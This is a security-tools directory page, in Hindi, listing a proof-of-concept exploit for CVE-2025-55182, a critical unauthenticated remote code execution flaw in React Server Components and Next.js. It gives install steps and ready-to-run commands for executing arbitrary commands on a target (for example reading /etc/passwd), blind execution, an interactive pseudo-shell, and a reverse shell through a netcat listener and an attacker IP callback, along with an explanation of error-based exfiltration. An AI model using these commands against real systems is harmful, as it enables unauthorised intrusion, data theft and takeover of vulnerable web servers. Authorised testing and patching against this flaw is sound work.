Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react2shell-poc — CVE-2025-55182 React2Shell PoC - React सर्वर घटकों / Next.js में गंभीर RCE। CVSS 10.0। त्रुटि-आधारित एक्सफिल, रिवर्स शेल, इंटरैक्टिव मोड। | Kitploit
उपकरण/GitHubGitHub/p3ta00/react2shell-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubp3ta00/react2shell-poc

react2shell-poc

CVE-2025-55182 React2Shell PoC - React सर्वर घटकों / Next.js में गंभीर RCE। CVSS 10.0। त्रुटि-आधारित एक्सफिल, रिवर्स शेल, इंटरैक्टिव मोड।

रिपॉजिटरी देखें
9123 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

React2Shell - CVE-2025-55182 PoC

CVE-2025-55182 के लिए प्रूफ ऑफ कॉन्सेप्ट, React सर्वर कंपोनेंट्स में एक गंभीर बिना प्रमाणीकरण के रिमोट कोड निष्पादन भेद्यता।

CVSS स्कोर: 10.0 (गंभीर)

भेद्यता

यह भेद्यता React के Flight प्रोटोकॉल डिसीरियलाइज़र में मौजूद है। विशेष रूप से तैयार पेलोड के माध्यम से प्रोटोटाइप प्रदूषण का शोषण करके, एक हमलावर कमजोर Next.js अनुप्रयोगों पर मनमाना कोड निष्पादन प्राप्त कर सकता है।

प्रभावित संस्करण

उत्पादभेद्यपैच
React19.0.0 - 19.2.019.0.1, 19.1.2, 19.2.1+
Next.js14.3.0-canary.77 - 16.x15.0.5, 15.1.9, 15.2.6, 16.0.7+

स्थापना

root@kitploit:~
git clone https://github.com/p3ta00/react2shell-poc.git
cd react2shell-poc
pip install requests

उपयोग

आउटपुट के साथ कमांड निष्पादन (डिफ़ॉल्ट - त्रुटि-आधारित एक्सफ़िल्ट्रेशन)

आउटपुट सीधे HTTP प्रतिक्रिया में NEXT_REDIRECT त्रुटि के माध्यम से लौटाया जाता है - कोई कॉलबैक सर्वर आवश्यक नहीं।

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id"
python3 react2shell-poc.py -t http://TARGET:3000 -c "cat /etc/passwd"

इंटरैक्टिव मोड

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -i

भेद्यता जांचें

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 --check

ब्लाइंड RCE (कोई आउटपुट नहीं)

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "touch /tmp/pwned" --blind

रिवर्स शेल

root@kitploit:~
# Start listener
nc -lvnp 4444

# Send payload
python3 react2shell-poc.py -t http://TARGET:3000 --revshell --lhost YOUR_IP --lport 4444

लीगेसी: कॉलबैक-आधारित एक्सफ़िल्ट्रेशन

root@kitploit:~
python3 react2shell-poc.py -t http://TARGET:3000 -c "id" --listen --lhost YOUR_IP

विकल्प

root@kitploit:~
-t, --target       Target URL (required)
-c, --command      Command to execute (output via error-based exfil by default)
--check            Check if target is vulnerable
--blind            Blind RCE mode (no output capture)
--listen           Use callback server instead of error-based exfil
-i, --interactive  Interactive pseudo-shell mode
--revshell         Attempt reverse shell
--lhost            Attacker IP for callbacks/reverse shell
--lport            Callback port (default: 9999)
--callback         Manual callback URL
--timeout          Request timeout in seconds (default: 30)

यह कैसे काम करता है

डिफ़ॉल्ट एक्सफ़िल्ट्रेशन विधि NEXT_REDIRECT त्रुटि इंजेक्शन का उपयोग करती है:

  1. कमांड निष्पादित करें और आउटपुट कैप्चर करें
  2. digest फ़ील्ड में आउटपुट के साथ NEXT_REDIRECT त्रुटि फेंकें
  3. Next.js फ्लाइट प्रतिक्रिया में त्रुटि को क्रमबद्ध करता है
  4. आउटपुट सीधे HTTP प्रतिक्रिया बॉडी में दिखाई देता है

यह कॉलबैक-आधारित एक्सफ़िल्ट्रेशन की तुलना में अधिक विश्वसनीय है क्योंकि इसे लक्ष्य से आउटबाउंड नेटवर्क एक्सेस की आवश्यकता नहीं होती है।

संदर्भ

  • Wiz Security - React2Shell खुलासा
  • Datadog सुरक्षा लैब्स विश्लेषण
  • NVD - CVE-2025-55182

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है। परीक्षण से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

लेखक

p3ta

टूल डाउनलोड करें